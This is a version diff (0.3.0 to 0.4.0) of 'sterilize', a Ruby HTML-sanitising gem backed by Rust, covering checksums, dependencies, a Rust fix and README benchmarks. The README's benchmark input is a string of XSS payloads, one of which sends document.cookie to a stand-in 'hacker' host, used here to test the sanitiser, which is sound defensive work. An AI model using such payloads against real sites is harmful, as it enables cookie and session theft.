sterilize 0.3.0 → 0.4.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: e2ce2e82f6cfbb9c8cba17cdafcff22b05a528be53dd26d73bbcd7e189bb96ef
-  data.tar.gz: 13fa1186f045426d987660daa92711fbb77a2c949c8db6974efee2aa8f02cfab
+  metadata.gz: 530a4e6175b009628c886e6cedee437f49f273c1585cde7dea5cb551a92f3329
+  data.tar.gz: 2c073cbab31aebc2a30ab371915b6b42c0216a62b9dfbba19b8af8fbc7f55b24
 SHA512:
-  metadata.gz: 2518105e1f28b45b700eca12d1ed69183f2f6c4ff2aa3f43c593ea5d14a3fd34f919364bbe7e145c64af8f329a210352091ede324648f02f052d695f1f965cd6
-  data.tar.gz: 553e5e1eb9ad4057ed8e28b0867bad24b3ce29ba75d34fdbcc5cf57645487deb48fd70e809ab1d18302a98615ac38e497d9d7d853366aefc73505862619371c1
+  metadata.gz: edc995bfee0167ae39e7c811cc879487b695eaab0efc71fd74639fbddf0ca512dd5e31c5b3d0ca2cea35cea37190288c5163fcc97f9df9239b52bc483d04208a
+  data.tar.gz: a5cb40366218797d21a85774a63c5e9f4784dfa27f7c79e1be92b91fd061cafb7b2db5d4ca94a83cdee1c37a437ff702378069c20aee3b7296d940ce670a2dc2

data/Gemfile.lock

@@ -1,13 +1,15 @@
 PATH
   remote: .
   specs:
-    sterilize (0.3.0)
+    sterilize (0.4.0)
       rutie (~> 0.0.4)
+      thermite (~> 0.13)
 
 GEM
   remote: https://rubygems.org/
   specs:
     diff-lcs (1.3)
+    minitar (0.9)
     rake (10.4.2)
     rspec (3.8.0)
       rspec-core (~> 3.8.0)
@@ -23,6 +25,11 @@ GEM
       rspec-support (~> 3.8.0)
     rspec-support (3.8.2)
     rutie (0.0.4)
+    thermite (0.13.0)
+      minitar (~> 0.5)
+      rake (>= 10)
+      tomlrb (~> 1.2)
+    tomlrb (1.2.8)
 
 PLATFORMS
   ruby

data/README.md

@@ -13,15 +13,16 @@ Take a look at the specs directory to see some of the cases that get handled. Th
 Finally, Sterilize is _fast_.
 
 ```ruby
-unsafe_string = "I am nice safe user input, nothing to see here.. <script>console.log('installing bitcoin miner')</script><SCRIPT>var+img=new+Image();img.src='http://hacker/'%20+%20document.cookie;</SCRIPT><img src='http://url.to.file.which/not.exist' onerror=alert(document.cookie);><a href='data:text/html;base64,PHNjcmlwdD5hbGVydCgna25pZ2h0c3RpY2sgd2FzIGhlcmUnKTwvc2NyaXB0Pg=='>HACK HACK HACK</a>" * 10000
+unsafe_string = "I am nice safe user input, nothing to see here.. <script>console.log('installing bitcoin miner')</script><SCRIPT>var+img=new+Image();img.src='http://hacker/'%20+%20document.cookie;</SCRIPT><img src='http://url.to.file.which/not.exist' onerror=alert(document.cookie);><a href='data:text/html;base64,PHNjcmlwdD5hbGVydCgna25pZ2h0c3RpY2sgd2FzIGhlcmUnKTwvc2NyaXB0Pg=='>HACK HACK HACK</a>" * 1000
+
 
 Benchmark.bm do | benchmark |
-  benchmark.report("Sterilize") do
+  benchmark.report("Sterilize#perform") do
     50.times do
       Sterilize.perform(unsafe_string)
     end
   end
-  benchmark.report("Loofah") do
+  benchmark.report("Loofah.scrub_fragment(unsafe_string, :prune).to_str") do
     50.times do
       Loofah.scrub_fragment(unsafe_string, :prune).to_str
     end
@@ -29,12 +30,12 @@ Benchmark.bm do | benchmark |
 end
 ```
 
-As you can see, Sterilize can operate significatnly faster. As with all benchmarks though, your mileage may vary and it's important to see how things work in practice for you.
+As you can see, Sterilize can operate significatnly faster (somewhere in the ballpark of 9-10 times faster). As with all benchmarks though, your mileage may vary and it's important to see how things work in practice for you.
 
-| Library   | user       | system   | total      | real         |
-| --------- | ---------- | -------- | ---------- | ------------ |
-| Sterilize | 74.585432  | 0.250712 | 74.836144  | ( 75.194400) |
-| Loofah    | 110.456900 | 0.619901 | 111.076801 | (111.206092) |
+| Library                                             | user       | system   | total      | real         |
+| --------------------------------------------------- | ---------- | -------- | ---------- | ------------ |
+| Sterilize#perform                                   | 1.284460   | 0.006097 | 1.290557   | ( 1.295062)  |
+| Loofah.scrub_fragment(unsafe_string, :prune).to_str | 10.183802  | 0.064826 | 10.248628  | ( 10.274430) |
 
 ## Installation
 

data/lib/sterilize/version.rb

@@ -1,3 +1,3 @@
 module Sterilize
-  VERSION = "0.3.0"
+  VERSION = "0.4.0"
 end

data/src/lib.rs

@@ -11,8 +11,9 @@ methods!(
     Sterilize,
     _itself,
     fn perform(input: RString) -> RString {
-        let dirty_string = input.map_err(|e| VM::raise_ex(e)).unwrap().to_string();
-        let sterile = clean(&dirty_string);
+        let dirty_r_string = input.map_err(|e| VM::raise_ex(e)).unwrap();
+        let dirty_string = dirty_r_string.to_str();
+        let sterile = clean(dirty_string);
         RString::new_utf8(&sterile)
     }
 );

data/sterilize.gemspec

@@ -27,6 +27,8 @@ Gem::Specification.new do |spec|
 
   spec.add_dependency 'rutie', '~> 0.0.4'
 
+  spec.add_runtime_dependency 'thermite', '~> 0.13'
+
   spec.add_development_dependency "bundler", "~> 2.0"
   spec.add_development_dependency "rake", "~> 10.0"
   spec.add_development_dependency "rspec", "~> 3.6"

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: sterilize
 version: !ruby/object:Gem::Version
-  version: 0.3.0
+  version: 0.4.0
 platform: ruby
 authors:
 - Martin Feckie
@@ -24,6 +24,20 @@ dependencies:
     - - "~>"
       - !ruby/object:Gem::Version
         version: 0.0.4
+- !ruby/object:Gem::Dependency
+  name: thermite
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.13'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.13'
 - !ruby/object:Gem::Dependency
   name: bundler
   requirement: !ruby/object:Gem::Requirement